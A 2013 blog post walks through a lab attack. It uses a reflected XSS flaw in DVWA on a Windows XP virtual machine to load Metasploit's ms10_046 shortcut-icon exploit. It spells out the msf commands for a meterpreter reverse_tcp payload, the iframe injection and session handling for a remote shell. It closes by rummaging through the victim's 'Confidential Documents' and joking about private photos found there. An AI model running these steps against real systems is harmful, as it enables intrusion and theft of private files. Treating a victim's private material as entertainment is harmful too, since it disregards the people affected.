Tuesday, June 25, 2013

Owning OS by XSS vulnerability

In this demonstration , I am going to show you that from even a very common XSS attach, how a we can gain access to whole system. For these I am using 2 Operating system one is Kali Linux and another is XP machine which will work as a client. For exploitation I will be using Metasploit Framework(console). For particular this exploitation there is one exploit named "ms10_046_shortcut_icon_dlllloader". Basically it is able to start the local server. That server will be serving the exploits to the victim. Once victim opens that URL, he will be hacked.

Lets see.

We need to first start Metasploit Framework in Kali (or Backtrack Terminal). It will be available under Applications => Kali Linux => Exploitation Tools => Metasploit => metasploit framework

Once you will start that it will look something like this.

To perform this exploitation, we need to use the exploit named "ms10_046_shortcut_icon_dllloader", as mentioned in the first paragraph. To use this exploit we need to give below command.

msf > use/exploit/windows/browser/ms10_046_shortcut_icon_dllloader

We can see from the below picture that exploit has been in use now.

Now withing these there are so many payloads. To check the list of all payloads we have to give below command. It will show the list of all payloads as shown in figure.

msf exploit (ms10_046_shortcut_icon_dllloader) > show payloads

For gaining access or owning the victim's machine there is one famous payload which is meterpreter reverse_tcp. So now we will set this payload from listed all these payloads. And to set this payload command is as follows.

msf exploit (ms10_046_shortcut_icon_dllloader) >set payload windows/meterpreter/reverse_tcp

To execute the payload our configuration should be perfect. Every payload has some options which we need to set such as RHOST, LHOST,LPORT etc as mentioned in below figure. 

In our payload we need to set LHOST option. Which will be our attacking machine's Ip address. So lets check our attacking machine's ip address by ifconfig command and we will also set the ip address to LHOST.

Lets set this ip address to our LHOST option by giving below command:

msf exploit (ms10_046_shortcut_icon_dllloader) > set lhost  

Now we will trigger the exploit.

Here we can see that exploit has given us one URL which has to be executed somehow by the client. As This is for the demonstration process, we are performing this on the virtual machine localhost. Here my client is Windows XP.

Now we will jump to windows XP. As title says that we can own OS by XSS vulnerability from the browser we have to setup a vulnerable web application.

To do that I have installed xampp server and in that I have hosted DVWA - Damn Vulnerable Web Application. There are several options such as we can perform SQL injection, XSS reflected, XSS stored, bruteforce attack etc.. So below figure shows the home page of the XSS vulnerability practice.

It is a normal search bar in which first, we are going to put a normal script and will wait for the result to come in order to confirm that whether the script is executing correctly or not. Script is as below.


So lets put this script in search and lets wait for the result.
If we look closer to the URL then its says something like this:


So it means our script is executing via name parameter/variable to the server side. 
Here we want to execute that Local url which is given by our metasploit. Metasploit has started server and waiting for any client to listen it's connection.

So directly we can not execute url here. We need to use simple IFRAME tag of html to use another page's content in current page.

So for that after Name parameter we will give this script:

<iframe src=></iframe>

so the original URL will become something like this:

<iframe src=></iframe>

So lets execute these url with command in browser. I shifted from Firefox to IE. I am executing this url in IE. ( Reason is mentioned in the last section of the report).

As we can see here our command got executed and this is the iframe in which there is not any image. Its a dynamic view or C drive 's xyz folder. We can actually click on file and create a new file delete these files.

Now lets go back to our metasploit. It was waiting for any client to execute it's URl on browser and it got one. So below picture shows that how its exploiting a victim's machine in order to create one session.

One session has created. To view all sessions we need to give below command:


So it will list all sessions means all those clients or victims who opened this url via xss vulnerability.

Now we need to go inside that victim's machine. For that we need to start that session by following command:

sessions -i 1    Where 1 is the ID number of session as mentioned in picture.

It will trigger a shell in windows machine and we will be able to operate the command prompt of victim's machine as shown in below figure:

Now lets have fun while finding some confidential information

Lets go to C Directory 

Wo Wo wo...I found one folder named Confidential Documents :D Keen to know whats inside that :) Lets go inside it.

Lol i found honeymoon pics :) really amazing :D 

Apart from Finding Jucy information we can also check for the task list.

So thus we can play around here and we can have fun into victim's machine.

Self Critical Evaluation

While performing this practical i faced some difficulties which are mentioned. I have also shown given the solutions that how to patch those difficulties and technical issues

1.MSF update : I setup everything and I was ready to exploit. I came to know that there is no such kind of exploit available in my metasploit. Even I have Kali Linux which is a latest version of backtrack. Though there is no such kind of exploit. So I immediately update my metasploit and got that exploit. So if you face this problem update your Metasploit Frame Work.

2.Firefox / chrome endless loop : I shifted from Firefox to IE, because I was facing some technical difficulties in Firefox and chrome. When I was executing that iframe script in browser, It was executing that script to a number of times. Means it was entering into endless loop. When I did the same in IE, It just executed one time and got the result. It might be an issue of browser, java script or flash. So to put in nutshell it works fantastic on IE.

3. Dvwa security low : If you are giving script into search bar and not getting result then change DVWA security from medium or high priority to low priority. Then and only then it will work.

No comments: